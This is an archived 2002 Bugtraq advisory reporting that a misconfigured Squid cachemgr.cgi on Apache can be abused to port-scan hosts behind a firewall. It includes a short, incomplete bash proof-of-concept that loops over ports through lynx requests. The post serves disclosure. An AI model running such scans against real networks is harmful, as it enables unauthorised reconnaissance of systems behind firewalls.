Home page logo

bugtraq logo Bugtraq mailing list archives

cachemgr.cgi (squid 2.3STABLE4)
From: Francisco Sáa Muñoz <fsaa () ip6seguridad com>
Date: Mon, 4 Feb 2002 17:43:36 +0100

]-* [IP6] Concept: Squid cachemgr.cgi misconfiguration

]-* [IP6] Configuration error [BID error class]

]-* [IP6] Platform investigated:        Linux Redhat 6.2
                                                Squid 2.3STABLE4
                                                Apache 1.3.12

]-* [IP6] The problem...

Due to a misconfiguration on Apache and Squid Is posible to use
cachemgr.cgi shipped with Squid to scan hosts under the corporate firewall.

...also we can gater a lot information about the navegation,

...also there is a lot code with bad programmer habits!

There is a lil' script to demonstrate the error, not so clean, but useful.

--- Begin nasty code miscachemgr.cgi ---
#!/bin/bash -x

# Port scanning using a misconfigured squid
# using open apache

# Usage miscachemgr host_vuln host_to_scan end_port

# Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz
# Coded by Francisco Sáa Muñoz
# IP6 [Logic Control]


mkdir from_$1_to_$2

while [ $PORT -lt $3 ]; do

# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
# port_$1_to_$2/$PORT.log 2>&1

lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1

--- End nasty Code ---

]-* [IP6] Solution

Deny access, configure it!

]-* [IP6] Thanks

Thanks to all IP6 staff for the good feeling.


Francisco Sáa Muñoz :: Nuno Treez \(HLP\)
Security Consultant/Tiger Team
IP6 Seguridad http://www.ip6seguridad.com
Linux User #119288
Proud mame.dk user #115087
"What if I'm not elite? Ragna Gronvold says I'm special" (yes, it's from

]-* [IP6] EOF

  By Date           By Thread  

Current thread:
  • cachemgr.cgi (squid 2.3STABLE4) Francisco Sáa Muñoz (Feb 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]